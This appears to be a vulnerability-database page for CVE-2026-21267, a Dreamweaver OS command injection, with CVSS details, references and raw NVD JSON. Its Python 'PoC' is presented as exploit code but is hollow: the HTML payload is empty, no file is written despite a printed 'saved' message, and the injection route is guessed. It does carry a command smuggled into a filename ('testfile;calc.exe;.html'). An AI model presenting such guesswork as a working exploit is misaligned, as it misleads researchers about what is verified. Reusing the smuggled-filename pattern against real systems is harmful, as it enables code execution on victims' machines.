CVE-2026-21267

Description

Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:dreamweaver:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe Dreamweaver Desktop <= 21.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21267 PoC - Adobe Dreamweaver OS Command Injection
# This PoC demonstrates the OS command injection vulnerability in Dreamweaver
# DISCLAMER: For educational and authorized security testing only

import os
import base64

def generate_malicious_file():
    """
    Generate a malicious file that exploits CVE-2026-21267
    The file contains OS commands that will be executed by Dreamweaver
    """
    # Malicious payload - attempts to execute calc.exe as proof of concept
    # In real attack, this could be any system command
    malicious_command = "calc.exe"
    
    # The PoC file content - in real scenario this would be a file format
    # that Dreamweaver processes (e.g., .html, .php, .dwt, etc.)
    poc_content = f'''
<!-- CVE-2026-21267 PoC -->
<!-- This file attempts to inject OS command via Dreamweaver processing -->
<html>
<body>
<script>
    // Malicious content that triggers OS command injection
    // when processed by vulnerable Dreamweaver version
</script>
</body>
</html>
'''
    
    # Alternative: If the vulnerability is in file path handling,
    # a filename with command injection characters could trigger it
    malicious_filename = f"testfile;{malicious_command};.html"
    
    print("[*] CVE-2026-21267 PoC Generator")
    print(f"[*] Malicious command: {malicious_command}")
    print(f"[*] Generated PoC file content saved")
    
    return poc_content, malicious_filename

def main():
    print("=" * 50)
    print("CVE-2026-21267 Adobe Dreamweaver OS Command Injection")
    print("=" * 50)
    
    content, filename = generate_malicious_file()
    
    print("\n[*] PoC generated successfully")
    print("[*] To test:")
    print("    1. Open the generated file with vulnerable Dreamweaver version")
    print("    2. Observe if the injected command is executed")
    print("\n[!] This PoC is for authorized testing only")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21267
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21267
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21267/
[4] VulDB https://vuldb.com/cve/CVE-2026-21267
[5] https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21267", "sourceIdentifier": "[email protected]", "published": "2026-01-13T19:16:24.213", "lastModified": "2026-01-14T20:51:15.670", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dreamweaver Desktop versions 21.6 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. Exploitation of this issue requires user interaction in that a victim must open a malicious file and scope is changed."}, {"lang": "es", "value": "Las versiones 21.6 y anteriores de Dreamweaver Desktop están afectadas por una vulnerabilidad de Neutralización Incorrecta de Elementos Especiales utilizados en un Comando del SO ('Inyección de Comandos del SO') que podría conducir a la ejecución de código arbitrario por un atacante. La explotación de este problema requiere interacción del usuario, ya que una víctima debe abrir un archivo malicioso y el ámbito se modifica."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:dreamweaver:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.7", "matchCriteriaId": "18B387B5-7F08-419A-B3EC-3CB93C7E9288"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/dreamweaver/apsb26-01.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}